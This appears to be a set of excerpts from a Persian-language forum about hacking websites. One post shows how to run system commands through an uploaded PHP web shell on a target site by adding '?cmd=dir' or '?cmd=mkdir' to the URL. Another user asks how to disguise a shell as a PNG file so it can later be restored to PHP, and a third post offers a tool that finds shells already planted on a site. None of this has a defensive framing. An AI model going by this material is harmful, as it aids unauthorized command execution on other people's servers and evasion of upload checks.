ریلود میشه و میتونید فایل های مختلف رو انتخاب و اپلود کنید. حالا یه سورپرایز دیگه شما میتونید مانند مثال بالا بجای up کاماند های cmd رو بزنید یعنی برای مشاهده directory و فولدر ها به این شکل در میاد: target.com/test/Goodzilam.php?cmd=dir برای ساخت فولدر از کاماند mkdir استفاده میکنیم: target.com/test/Goodzilam.php?cmd=mkdir foldername بووووووووم فولدری به نام foldername ساخته میشه up.php -
آپلود شل به صورت png و تغییر دوباره آن به فرمتphp
Shiru پاسخی ارسال کرد برای یک موضوع در سوال و جواب های نفوذ به سایت ها و سرورها و روشهای مقابله
سلام ببخشید میخواستم بدونم چطور میتونم یه شل رو به صورت عکس یاpng ذخیره کنم و بعد دوباره بهفرمت php برگردونم و از اون استفاده کنم یه سرچ هم تو گوگل هم تو انجمن خودمون زدم به جواب درستی نرسیدم لطفا کنک کنید -
اسکریپت شل فایندر قوی براتون قرار دادم با این ابزار میتونید ادرس سایت مورد نظر بدهید اگه شل ابلود شده باشه از قبل لینکشو به شما میده عکس از محیط برنامه Find Shell.rar
-
- مسیر شل
- اسکریپت Shell Finder
- (و 8 مورد دیگر)